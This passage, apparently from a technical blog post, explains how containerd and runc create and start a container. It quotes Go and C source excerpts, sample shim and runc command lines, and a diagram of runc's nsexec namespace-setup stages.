        <span class="n">Runtime</span><span class="o">:</span>         <span class="n">container</span><span class="o">.</span><span class="n">Runtime</span><span class="o">.</span><span class="n">Name</span><span class="p">,</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">rtime</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">v2Runtime</span>
    <span class="n">c</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">rtime</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// [3]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Inside <code class="language-plaintext highlighter-rouge">Create()</code>, <code class="language-plaintext highlighter-rouge">NewBundle()</code> is called to create the runtime container directories and files [4]. Later, <code class="language-plaintext highlighter-rouge">m.manager.Start()</code> [5] spawns a <code class="language-plaintext highlighter-rouge">containerd-shim-runc-v2</code> process as the container shim daemon. Finally, <code class="language-plaintext highlighter-rouge">shimTask.Create()</code> sends a <code class="language-plaintext highlighter-rouge">CreateTaskRequest</code> to the shim daemon, which in turn executes the command <code class="language-plaintext highlighter-rouge">run create --bundle &lt;bundle_dir&gt;</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/task_manager.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">m</span> <span class="o">*</span><span class="n">TaskManager</span><span class="p">)</span> <span class="n">Create</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">taskID</span> <span class="kt">string</span><span class="p">,</span> <span class="n">opts</span> <span class="n">runtime</span><span class="o">.</span><span class="n">CreateOpts</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">bundle</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">NewBundle</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">m</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="n">m</span><span class="o">.</span><span class="n">state</span><span class="p">,</span> <span class="n">taskID</span><span class="p">,</span> <span class="n">opts</span><span class="o">.</span><span class="n">Spec</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="n">shim</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">m</span><span class="o">.</span><span class="n">manager</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">taskID</span><span class="p">,</span> <span class="n">bundle</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="n">shimTask</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">newShimTask</span><span class="p">(</span><span class="n">shim</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="k">func</span><span class="p">()</span> <span class="p">(</span><span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">shimTask</span><span class="o">.</span><span class="n">Create</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span> <span class="c">// [6]</span>
        <span class="c">// [...]</span>
    <span class="p">}()</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The OCI config file is created in <code class="language-plaintext highlighter-rouge">NewBundle()</code> with the path <code class="language-plaintext highlighter-rouge">"/run/containerd/io.containerd.runtime.v2.task/&lt;namespace&gt;/&lt;id&gt;/config.json"</code> [7].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/bundle.go</span>
<span class="k">func</span> <span class="n">NewBundle</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="n">state</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">,</span> <span class="n">spec</span> <span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span><span class="p">)</span> <span class="p">(</span><span class="n">b</span> <span class="o">*</span><span class="n">Bundle</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">ns</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">namespaces</span><span class="o">.</span><span class="n">NamespaceRequired</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// ns == "moby"</span>
    <span class="n">b</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">Bundle</span><span class="p">{</span>
        <span class="n">ID</span><span class="o">:</span>        <span class="n">id</span><span class="p">,</span>
        <span class="n">Path</span><span class="o">:</span>      <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">state</span><span class="p">,</span> <span class="n">ns</span><span class="p">,</span> <span class="n">id</span><span class="p">),</span> <span class="c">// state == "/run/containerd/io.containerd.runtime.v2.task/"</span>
                                                 <span class="c">// id == "&lt;container id&gt;"</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">spec</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">spec</span> <span class="o">:=</span> <span class="n">spec</span><span class="o">.</span><span class="n">GetValue</span><span class="p">();</span> <span class="n">spec</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">specPath</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">b</span><span class="o">.</span><span class="n">Path</span><span class="p">,</span> <span class="n">oci</span><span class="o">.</span><span class="n">ConfigFilename</span><span class="p">)</span>
            <span class="n">err</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">WriteFile</span><span class="p">(</span><span class="n">specPath</span><span class="p">,</span> <span class="n">spec</span><span class="p">,</span> <span class="m">0666</span><span class="p">)</span> <span class="c">// [7]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The actual command for spawning a shim process looks like:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/containerd-shim-runc-v2 <span class="se">\</span>
<span class="nt">-namespace</span> moby <span class="se">\</span>
<span class="nt">-address</span> /run/containerd/containerd.sock <span class="se">\</span>
<span class="nt">-publish-binary</span> /usr/bin/containerd <span class="se">\</span>
<span class="nt">-id</span> 636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5 <span class="se">\</span>
start
</code></pre></div></div>

<p>The arguments of the command executed by the shim daemon to create a container consist of the global part (before <code class="language-plaintext highlighter-rouge">create</code>) and the sub-command part (after <code class="language-plaintext highlighter-rouge">create</code>).</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/runc <span class="se">\</span>
<span class="nt">--root</span> /var/run/docker/runtime-runc/moby <span class="se">\</span>
<span class="nt">--log</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json <span class="se">\</span>
<span class="nt">--log-format</span> json <span class="se">\</span>
<span class="nt">--systemd-cgroup</span> <span class="se">\</span>
create <span class="se">\</span>
<span class="nt">--bundle</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5 <span class="se">\</span>
<span class="nt">--pid-file</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/init.pid <span class="se">\</span>
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5
</code></pre></div></div>

<h4 id="124-enter-the-container">1.2.4. Enter the Container</h4>

<p>In the final step, <code class="language-plaintext highlighter-rouge">tsk.Start()</code> is called to send a <code class="language-plaintext highlighter-rouge">"/containerd.services.tasks.v1.Tasks/Start"</code> request to <code class="language-plaintext highlighter-rouge">containerd</code>, whose handler is <code class="language-plaintext highlighter-rouge">Start()</code> in <code class="language-plaintext highlighter-rouge">local.go</code>.</p>

<p>This function first looks up the running task [1] and then sends a <code class="language-plaintext highlighter-rouge">StartRequest</code> to the shim daemon to start the container [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Start</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">StartRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">StartResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getTask</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="c">// [...]</span>
    <span class="n">p</span> <span class="o">:=</span> <span class="n">runtime</span><span class="o">.</span><span class="n">Process</span><span class="p">(</span><span class="n">t</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// core/runtime/v2/shim.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">shimTask</span><span class="p">)</span> <span class="n">Start</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">task</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">task</span><span class="o">.</span><span class="n">StartRequest</span><span class="p">{</span> <span class="c">// [2]</span>
        <span class="n">ID</span><span class="o">:</span> <span class="n">s</span><span class="o">.</span><span class="n">ID</span><span class="p">(),</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>On the shim daemon side, the command <code class="language-plaintext highlighter-rouge">runc start &lt;id&gt;</code> is executed to unblock the init process that <code class="language-plaintext highlighter-rouge">runc create</code> left parked just before <code class="language-plaintext highlighter-rouge">execve()</code>.</p>

<p>The actual command line looks like:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/runc <span class="se">\</span>
<span class="nt">--root</span> /var/run/docker/runtime-runc/moby <span class="se">\</span>
<span class="nt">--log</span> /run/containerd/io.containerd.runtime.v2.task/moby/636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5/log.json <span class="se">\</span>
<span class="nt">--log-format</span> json <span class="se">\</span>
<span class="nt">--systemd-cgroup</span> <span class="se">\</span>
start <span class="se">\</span>
636494bd4a69bdaa80604b4ac2f7a0fee7bcdd58cb8f5884c2101666fbb24dd5
</code></pre></div></div>

<h2 id="2-runc-internal">2. Runc Internal</h2>

<p>Here, we try to understand how <code class="language-plaintext highlighter-rouge">runc</code> loads the container by reviewing the source code.</p>

<h3 id="21-cmd-create">2.1. Cmd: create</h3>

<p>The command “create” handler is <code class="language-plaintext highlighter-rouge">startContainer()</code>. It indirectly calls <code class="language-plaintext highlighter-rouge">start()</code>, which in turn calls <code class="language-plaintext highlighter-rouge">createExecFifo()</code> [1] to create a FIFO file and builds the init command by calling <code class="language-plaintext highlighter-rouge">newParentProcess()</code> [2]. Finally, <code class="language-plaintext highlighter-rouge">parent.start()</code> is called to execute <code class="language-plaintext highlighter-rouge">runc init</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// create.go</span>
<span class="k">var</span> <span class="n">createCommand</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">{</span>
    <span class="n">Name</span><span class="o">:</span>  <span class="s">"create"</span><span class="p">,</span>
    <span class="n">Action</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">_</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">cmd</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">Command</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">status</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">startContainer</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">CT_ACT_CREATE</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">},</span>
<span class="p">}</span>

<span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">start</span><span class="p">(</span><span class="n">process</span> <span class="o">*</span><span class="n">Process</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">process</span><span class="o">.</span><span class="n">Init</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">createExecFifo</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [1]</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="c">// [...]</span>
    <span class="n">parent</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">newParentProcess</span><span class="p">(</span><span class="n">process</span><span class="p">)</span> <span class="c">// [2]</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">parent</span><span class="o">.</span><span class="n">start</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">newParentProcess()</code> prepares the command line for <code class="language-plaintext highlighter-rouge">/proc/self/fd/&lt;runc_fd&gt; init</code>. The command and process information are wrapped into an <code class="language-plaintext highlighter-rouge">initProcess</code> object and returned [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">newParentProcess</span><span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">Process</span><span class="p">)</span> <span class="p">(</span><span class="n">parentProcess</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">safeExe</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">exeseal</span><span class="o">.</span><span class="n">CloneSelfExe</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">stateDir</span><span class="p">)</span>
        <span class="c">// [...]</span>
        <span class="n">exePath</span> <span class="o">=</span> <span class="s">"/proc/self/fd/"</span> <span class="o">+</span> <span class="n">strconv</span><span class="o">.</span><span class="n">Itoa</span><span class="p">(</span><span class="kt">int</span><span class="p">(</span><span class="n">safeExe</span><span class="o">.</span><span class="n">Fd</span><span class="p">()))</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="n">cmd</span> <span class="o">:=</span> <span class="n">exec</span><span class="o">.</span><span class="n">Command</span><span class="p">(</span><span class="n">exePath</span><span class="p">,</span> <span class="s">"init"</span><span class="p">)</span>
    <span class="n">cmd</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">0</span><span class="p">]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">p</span><span class="o">.</span><span class="n">Init</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="n">c</span><span class="o">.</span><span class="n">newInitProcess</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">comm</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">parent.start()</code> is then called to fork a child process and execve <code class="language-plaintext highlighter-rouge">runc init</code> [5].</p>

<p>Now there are two processes. The child (<code class="language-plaintext highlighter-rouge">runc init</code>) is the one that <strong>enters the new namespaces</strong> and <strong>sets up the container environment</strong> from the inside, such as mounting the filesystem and applying seccomp rules. It is the same process that will <strong>later execve the user’s command</strong>.</p>

<p>The parent stays on the host as a privileged helper, doing the things the child <strong>can’t do</strong> once it’s inside the namespaces: applying cgroups, providing the uid/gid maps, and running host-side hooks.</p>

<p>The two coordinate over a sync socket <code class="language-plaintext highlighter-rouge">p.comm.syncSockParent</code> [6]. Once the child is ready, the parent will receive the <code class="language-plaintext highlighter-rouge">procReady</code> event [7] and exit.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/process_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">initProcess</span><span class="p">)</span> <span class="n">start</span><span class="p">()</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">cmd</span><span class="o">.</span><span class="n">Start</span><span class="p">()</span> <span class="c">// [5]</span>

    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">manager</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">pid</span><span class="p">())</span> <span class="c">// set up cgroups</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">createNetworkInterfaces</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">p</span><span class="o">.</span><span class="n">setupNetworkDevices</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">p</span><span class="o">.</span><span class="n">config</span><span class="o">.</span><span class="n">Config</span><span class="o">.</span><span class="n">HasHook</span><span class="p">(</span><span class="n">configs</span><span class="o">.</span><span class="n">CreateContainer</span><span class="p">,</span> <span class="n">configs</span><span class="o">.</span><span class="n">StartContainer</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>

    <span class="n">ierr</span> <span class="o">:=</span> <span class="n">parseSync</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">comm</span><span class="o">.</span><span class="n">syncSockParent</span> <span class="c">/* [6] */</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">sync</span> <span class="o">*</span><span class="n">syncT</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
        <span class="k">case</span> <span class="n">procMountPlease</span><span class="o">:</span>
            <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">procSeccomp</span><span class="o">:</span>
            <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">procReady</span><span class="o">:</span> <span class="c">// [7]</span>
            <span class="c">// [...]</span>
        <span class="k">case</span> <span class="n">procHooks</span><span class="o">:</span>
            <span class="c">// [...]</span>
        <span class="c">// [...]</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Let’s see how <code class="language-plaintext highlighter-rouge">runc init</code> works.</p>

<h3 id="22-cmd-init">2.2. Cmd: init</h3>

<p>Before looking at the “init” implementation, we have to talk about the <code class="language-plaintext highlighter-rouge">nsexec()</code> constructor.</p>

<p>A Golang binary can use <code class="language-plaintext highlighter-rouge">cgo</code> to refer to C functions. Here, the <code class="language-plaintext highlighter-rouge">nsexec()</code> function works as a C constructor, so it is triggered before <code class="language-plaintext highlighter-rouge">main()</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/nsenter/nsenter.go</span>
<span class="c">/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/</span>
<span class="k">import</span> <span class="s">"C"</span>
</code></pre></div></div>

<p>It does nothing if there is no pipe [1], but for <code class="language-plaintext highlighter-rouge">runc init</code>, because its parent process (<code class="language-plaintext highlighter-rouge">runc create</code>) sets up this environment variable for it, it passes the check and continues to run. The comment also implies the same thing.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// libcontainer/nsenter/nsexec.c</span>
<span class="kt">void</span> <span class="nf">nsexec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">pipenum</span> <span class="o">=</span> <span class="n">getenv_int</span><span class="p">(</span><span class="s">"_LIBCONTAINER_INITPIPE"</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pipenum</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [1]</span>
        <span class="cm">/* We are not a runc init. Just return to go runtime. */</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This env is set to one side of the init socket pair [2] when <code class="language-plaintext highlighter-rouge">runc create</code> is preparing the command line of the init process.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">newParentProcess</span><span class="p">(</span><span class="n">p</span> <span class="o">*</span><span class="n">Process</span><span class="p">)</span> <span class="p">(</span><span class="n">parentProcess</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">cmd</span><span class="o">.</span><span class="n">ExtraFiles</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">ExtraFiles</span><span class="p">,</span> <span class="n">comm</span><span class="o">.</span><span class="n">initSockChild</span><span class="p">)</span> <span class="c">// [2]</span>
    <span class="n">cmd</span><span class="o">.</span><span class="n">Env</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">Env</span><span class="p">,</span>
        <span class="s">"_LIBCONTAINER_INITPIPE="</span><span class="o">+</span><span class="n">strconv</span><span class="o">.</span><span class="n">Itoa</span><span class="p">(</span><span class="n">stdioFdCount</span><span class="o">+</span><span class="nb">len</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">ExtraFiles</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">),</span>
    <span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Going back to <code class="language-plaintext highlighter-rouge">nsexec()</code>, we can see that it holds a complex stage machine to set up the isolated environment.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// libcontainer/nsenter/nsexec.c</span>
<span class="kt">void</span> <span class="nf">nsexec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">switch</span> <span class="p">(</span><span class="n">setjmp</span><span class="p">(</span><span class="n">env</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">STAGE_PARENT</span><span class="p">:</span>
    <span class="c1">// [...]</span>
    <span class="k">case</span> <span class="n">STAGE_CHILD</span><span class="p">:</span>
    <span class="c1">// [...]</span>
    <span class="k">case</span> <span class="n">STAGE_INIT</span><span class="p">:</span>
    <span class="c1">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The diagram below may help you understand the whole flow.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>     stage-0  (STAGE_PARENT)  // in host namespaces
        |  parse netlink bootstrap (cloneflags, uid/gid maps...)
 (child)|
 +------|  clone_parent(&amp;env, STAGE_CHILD)
 |      |
 |      |  stage-1 &gt;&gt; SYNC_USERMAP_PLS
 |      |                                 write /proc/&lt;stage-1&gt;/uid_map, gid_map
 |      |  stage-1 &lt;&lt; SYNC_USERMAP_ACK
 |      |
 |      |
 |      |  stage-1 &gt;&gt; SYNC_RECVPID_PLS
 |      |                                 receives stage-2 pid, forwards up to Go
 |      |  stage-1 &lt;&lt; SYNC_RECVPID_ACK
 |      |  stage-1 &gt;&gt; SYNC_CHILD_FINISH
 |      +  exit(0)
 |
 |
 |
 +-&gt; stage-1  (STAGE_CHILD) // inside several new namespaces
        |  setns(provided namespaces)
        |
        |  try_unshare(CLONE_NEWUSER)
        |  SYNC_USERMAP_PLS &gt;&gt; stage-0
        |  (waiting...)
        |  SYNC_USERMAP_ACK &lt;&lt; stage-0
        |
        |  try_unshare(config.cloneflags)
 +------|  clone_parent(&amp;env, STAGE_INIT)
 |      |
 |      |  SYNC_RECVPID_PLS &gt;&gt; stage-0
 |      |  (waiting...)
 |      |  SYNC_RECVPID_ACK &lt;&lt; stage-0
 |      |  SYNC_CHILD_FINISH &gt;&gt; stage-0
 |      +  exit(0)
 |
 |
 |
 +-&gt; stage-2  (STAGE_INIT) // inside ALL new namespaces, PID 1 in new pidns
        |  final cleanup
        +  return (and continue)
</code></pre></div></div>

<p>The stage-1 child is required because <code class="language-plaintext highlighter-rouge">unshare(CLONE_NEWPID)</code> <strong>doesn’t move itself into the new PID namespace</strong>. That is why after the stage-1 process calls <code class="language-plaintext highlighter-rouge">setns()</code> and <code class="language-plaintext highlighter-rouge">unshare()</code> all namespaces, it has to fork the stage-2 child process, whose pid is 1 in the new namespace.</p>

<p>In fact, <code class="language-plaintext highlighter-rouge">init()</code> works as initializer for <code class="language-plaintext highlighter-rouge">init</code> package, but this function covers all init command handling, and <code class="language-plaintext highlighter-rouge">main()</code> won’t be executed later. Internally, <code class="language-plaintext highlighter-rouge">startInitialization()</code> is called to recover file descriptors, reconstruct the init configuration, and synchronize status with its parent process, <code class="language-plaintext highlighter-rouge">runc create</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// init.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">)</span> <span class="o">&gt;</span> <span class="m">1</span> <span class="o">&amp;&amp;</span> <span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">[</span><span class="m">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"init"</span> <span class="p">{</span>
        <span class="n">libcontainer</span><span class="o">.</span><span class="n">Init</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// libcontainer/init_linux.go</span>
<span class="k">func</span> <span class="n">Init</span><span class="p">()</span> <span class="p">{</span>
    <span class="c">// [...]</span>
